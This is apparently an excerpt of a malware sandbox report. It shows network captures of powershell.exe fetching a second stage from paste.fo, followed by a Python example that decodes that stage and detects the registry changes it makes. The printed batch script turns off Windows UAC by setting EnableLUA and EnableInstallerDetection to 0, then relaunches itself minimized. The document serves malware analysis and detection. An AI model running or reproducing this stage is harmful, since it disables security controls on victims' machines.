Dec 30, 2024 11:40:28.177920103 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:28.223335981 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.228553057 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:28.228590012 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.281835079 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:28.383923054 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.384397984 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.384427071 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.384454012 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.384478092 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.391403913 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.391438961 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.391524076 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.391560078 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.391586065 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.393580914 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:28.393609047 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
                                                                                Dec 30, 2024 11:40:28.403239012 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.403250933 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.459440947 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.469114065 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.469399929 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.469520092 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.469605923 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.469696045 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.469794989 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.469912052 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.470063925 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.470148087 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.470231056 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.470313072 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.470736980 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.474062920 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.474085093 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.475825071 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.476053953 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.476142883 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.476217985 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.476303101 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.476383924 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.477000952 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.477097988 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.477181911 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.477272987 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.479681969 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.479696989 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.479804993 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.479849100 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.554440975 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.554456949 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.554501057 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.554884911 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.554900885 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.556092024 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.556118965 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.557341099 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.557353020 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.558022976 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.561175108 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.561197996 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.561599016 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.561672926 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.561680079 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.561763048 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.609008074 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.609041929 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.612157106 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.612178087 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.612601995 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.638206005 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.638235092 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.638279915 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.638293982 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.638395071 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.638993979 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.639012098 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.639054060 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.639153957 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.639158010 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.639240026 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.639909983 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.639935017 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.639967918 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.639974117 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.640103102 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.645020962 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.645046949 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.646182060 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.646183014 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.646197081 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.646214962 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.646847010 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.646882057 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.649089098 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.649095058 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.652909040 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.653024912 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.722135067 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.722162962 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.722289085 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.722317934 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.722474098 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.722515106 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.722538948 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.723007917 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.723063946 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.723700047 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.723725080 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.726780891 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.726788998 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.726825953 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.727015972 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.727060080 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.729104996 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.729136944 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.729274035 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.729283094 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.729345083 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.729368925 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.729650021 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.729656935 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.729734898 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.729938030 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.729955912 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.730026007 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.730032921 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.730161905 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.730627060 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.730645895 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.730714083 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.730719090 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.730798960 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.806567907 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.806597948 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.806689024 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.806713104 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.806812048 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.806977987 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.807002068 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.807171106 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.807178020 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.807245970 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.807390928 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.807413101 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.807501078 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.807506084 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.807862997 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.807882071 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.807903051 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.808007956 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.808012962 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.808243990 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.813487053 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.813505888 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.813559055 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.813569069 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.813595057 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.813740015 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.813757896 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.814152002 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.814184904 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.814562082 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.814588070 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.815361977 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.815368891 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.815507889 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.816041946 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.816087961 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.891154051 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.891180992 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.891415119 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.891448975 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.891885996 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.891896963 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.892035007 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.892051935 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.892313957 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.892333984 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.894387007 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.896508932 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.896517992 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.897594929 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.897886038 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.897954941 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.897970915 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.897989988 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.897999048 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.898334026 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.898355007 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.898571014 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.898585081 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.898938894 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.898972034 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.901719093 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.902757883 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.902764082 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.902893066 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.902939081 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.902987957 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.903283119 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:28.975636005 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.975672007 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:28.975747108 CET49731443192.168.2.4185.199.111.133
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Dec 30, 2024 11:40:17.598069906 CET  192.168.2.4  1.1.1.1  0xfc22    Standard query (0)  paste.fo                   A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:27.640077114 CET  192.168.2.4  1.1.1.1  0x65fe    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:27.640203953 CET  192.168.2.4  1.1.1.1  0x9a27    Standard query (0)  raw.githubusercontent.com  65              IN (0x0001)  false
Dec 30, 2024 11:40:32.200329065 CET  192.168.2.4  1.1.1.1  0x98ff    Standard query (0)  www.google.com             A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:32.200468063 CET  192.168.2.4  1.1.1.1  0x595f    Standard query (0)  www.google.com             65              IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
Dec 30, 2024 11:40:17.608623028 CET  1.1.1.1    192.168.2.4  0xfc22    No error (0)  paste.fo                   -      172.67.144.225   A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:17.608623028 CET  1.1.1.1    192.168.2.4  0xfc22    No error (0)  paste.fo                   -      104.21.28.76     A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:27.646481991 CET  1.1.1.1    192.168.2.4  0x65fe    No error (0)  raw.githubusercontent.com  -      185.199.111.133  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:27.646481991 CET  1.1.1.1    192.168.2.4  0x65fe    No error (0)  raw.githubusercontent.com  -      185.199.110.133  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:27.646481991 CET  1.1.1.1    192.168.2.4  0x65fe    No error (0)  raw.githubusercontent.com  -      185.199.109.133  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:27.646481991 CET  1.1.1.1    192.168.2.4  0x65fe    No error (0)  raw.githubusercontent.com  -      185.199.108.133  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:32.207143068 CET  1.1.1.1    192.168.2.4  0x98ff    No error (0)  www.google.com             -      142.250.185.100  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:40:32.207218885 CET  1.1.1.1    192.168.2.4  0x595f    No error (0)  www.google.com             -      -                65              IN (0x0001)  false
                                                                                • paste.fo
                                                                                • raw.githubusercontent.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49730        172.67.144.225  443               7440  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:40:18 UTC  74                 OUT        GET /raw/a1af5a4d0301 HTTP/1.1
Host: paste.fo
Connection: Keep-Alive
2024-12-30 10:40:18 UTC  1047               IN         HTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 10:40:18 GMT
                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=sr7roqasevrnr4tr03hlujs5fl; path=/
                                                                                Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2BjX15ASxKbFcfdRVhyF0jlDnaeilIlvlooV2xdDEF%2BSEKWFji80hMMI28gl7Mz3ewhMKl0f6lmZOMN6EoxoP3saCS4ETewAqZSJkpi1nHSjxChm2uGsyoTMuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa169318868159f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1641&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2325&recv_bytes=688&delivery_rate=1706604&cwnd=175&unsent_bytes=0&cid=b4fa84ac0bc125ee&ts=329&x=0"
                                                                                2024-12-30 10:40:18 UTC322INData Raw: 36 38 61 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 6c 6f 63 61 6c 20 45 4e 41 42 4c 45 44 45 4c 41 59 45 44 45 58 50 41 4e 53 49 4f 4e 0d 0a 0d 0a 3a 3a 20 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 0d 0a 73 65 74 20 22 63 6d 64 5f 72 65 67 3d 72 65 67 2e 65 78 65 20 41 44 44 22 0d 0a 73 65 74 20 22 70 6f 6c 69 63 79 5f 70 61 74 68 3d 48 4b 4c 4d 5c 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69 63 69 65 73 5c 53 79 73 74 65 6d 22 0d 0a 73 65 74 20 22 72 65 67 5f 70 61 72 61 6d 73 3d 2f 74 20 52 45 47 5f 44 57 4f 52 44 20 2f 64 20 30 20 2f 66 22 0d 0a 73 65 74 20 22 70 73 5f 63 6d 64 3d 50 6f 77 65 72 53 68 65 6c 6c 20 2d 43
                                                                                Data Ascii: 68a
                                                                                @echo off
                                                                                setlocal ENABLEDELAYEDEXPANSION

                                                                                :: ????? ??????? ?????? ?????
                                                                                set "cmd_reg=reg.exe ADD"
                                                                                set "policy_path=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
                                                                                set "reg_params=/t REG_DWORD /d 0 /f"
                                                                                set "ps_cmd=PowerShell -C
                                                                                2024-12-30 10:40:18 UTC1359INData Raw: 45 44 20 73 65 74 20 49 53 5f 4d 49 4e 49 4d 49 5a 45 44 3d 31 20 26 26 20 73 74 61 72 74 20 22 22 20 2f 6d 69 6e 20 22 25 7e 64 70 6e 78 30 22 20 25 2a 20 26 26 20 65 78 69 74 0d 0a 0d 0a 3a 3a 20 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 0d 0a 21 63 6d 64 5f 72 65 67 21 20 21 70 6f 6c 69 63 79 5f 70 61 74 68 21 20 2f 76 20 45 6e 61 62 6c 65 4c 55 41 20 21 72 65 67 5f 70 61 72 61 6d 73 21 0d 0a 21 63 6d 64 5f 72 65 67 21 20 21 70 6f 6c 69 63 79 5f 70 61 74 68 21 20 2f 76 20 45 6e 61 62 6c 65 49 6e 73 74 61 6c 6c 65 72 44 65 74 65 63 74 69 6f 6e 20 21 72 65 67 5f 70 61 72 61 6d 73 21 0d 0a 21 63 6d 64 5f 72 65 67 21 20 21 70 6f 6c 69 63
                                                                                Data Ascii: ED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit

                                                                                :: ????? ????? ????????? ???????? ????????? ?????? ??????
                                                                                !cmd_reg! !policy_path! /v EnableLUA !reg_params!
                                                                                !cmd_reg! !policy_path! /v EnableInstallerDetection !reg_params!
                                                                                !cmd_reg! !polic
                                                                                2024-12-30 10:40:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0
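The stage fetched from paste.fo above never spells out the command it runs: `cmd_reg`, `policy_path` and `reg_params` are assigned with `set` and only assembled at run time through delayed expansion (`!cmd_reg! !policy_path! /v EnableLUA !reg_params!`), so a string search of the dropped .bat for `reg.exe ADD ... EnableLUA` finds nothing, even though the process list further down shows exactly that command line. The Python below is an added example and not part of the report: it restores the CR/LF bytes that the Data Ascii column drops, strips the chunk-size line of the chunked response, and resolves the variables to the effective commands. The hex prefix and the reassembled script lines are constructed from what the report shows (the mis-encoded comment lines and the truncated `ps_cmd` line are omitted); the function names are mine.

```python
"""Resolve a batch stage's delayed-expansion variables to the commands it
actually runs. Added example; not part of the Joe Sandbox report."""
import re

# Leading bytes of the first "Data Raw" record of the paste.fo response,
# copied from the report (the report shows only a prefix of each record).
DATA_RAW_PREFIX = (
    "36 38 61 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 6c 6f 63 61 6c 20 "
    "45 4e 41 42 4c 45 44 45 4c 41 59 45 44 45 58 50 41 4e 53 49 4f 4e 0d 0a 0d 0a "
)

# Script lines reassembled from the report's two Data Ascii records.
# Constructed from the page: the '::' comment lines (mis-encoded in the
# report) and the line cut off at 'ps_cmd=PowerShell -C' are left out.
STAGE_TWO = "\r\n".join([
    r'@echo off',
    r'setlocal ENABLEDELAYEDEXPANSION',
    r'set "cmd_reg=reg.exe ADD"',
    r'set "policy_path=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"',
    r'set "reg_params=/t REG_DWORD /d 0 /f"',
    r'!cmd_reg! !policy_path! /v EnableLUA !reg_params!',
    r'!cmd_reg! !policy_path! /v EnableInstallerDetection !reg_params!',
])


def data_raw_to_text(hex_dump):
    """Decode a report 'Data Raw' hex dump back into text, keeping the CR/LF
    bytes that the report's 'Data Ascii' rendering drops."""
    return bytes.fromhex("".join(hex_dump.split())).decode("latin-1")


def strip_chunk_header(text):
    """Split off the HTTP/1.1 chunk-size line ('68a' here, i.e. 1674 bytes)
    that precedes the script in a chunked response body."""
    size_line, _, rest = text.partition("\r\n")
    return int(size_line.split(";")[0], 16), rest


SET_RE = re.compile(r'^set\s+"([^=]+)=(.*)"$', re.IGNORECASE)
VAR_RE = re.compile(r'[!%]([^!%\s]+)[!%]')   # !name! (delayed) or %name%


def expand_batch(script):
    """Return the script's command lines with !name! / %name% references
    replaced by the values assigned earlier via set "name=value".
    Assignment values are expanded too, so chained variables resolve.
    Straight-line only: goto, call and if are not followed."""
    env = {}

    def substitute(line):
        return VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), line)

    commands = []
    for raw in script.splitlines():
        line = raw.strip()
        low = line.lower()
        if not line or line.startswith("::") or low.startswith("rem "):
            continue                                  # comment
        if low == "@echo off" or low.startswith("setlocal"):
            continue                                  # interpreter housekeeping
        m = SET_RE.match(line)
        if m:
            env[m.group(1).strip().lower()] = substitute(m.group(2))
            continue
        commands.append(substitute(line))
    return commands


UAC_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_WRITE_RE = re.compile(
    r"^reg(?:\.exe)?\s+add\s+" + re.escape(UAC_KEY) + r"\s+/v\s+(\S+)\s+.*?/d\s+0(?:\s|$)",
    re.IGNORECASE,
)


def uac_policy_writes(commands):
    """Names of UAC policy values that the expanded commands set to 0
    (EnableLUA=0 turns UAC off entirely at the next logon)."""
    hits = []
    for command in commands:
        m = UAC_WRITE_RE.match(command)
        if m:
            hits.append(m.group(1))
    return hits
```

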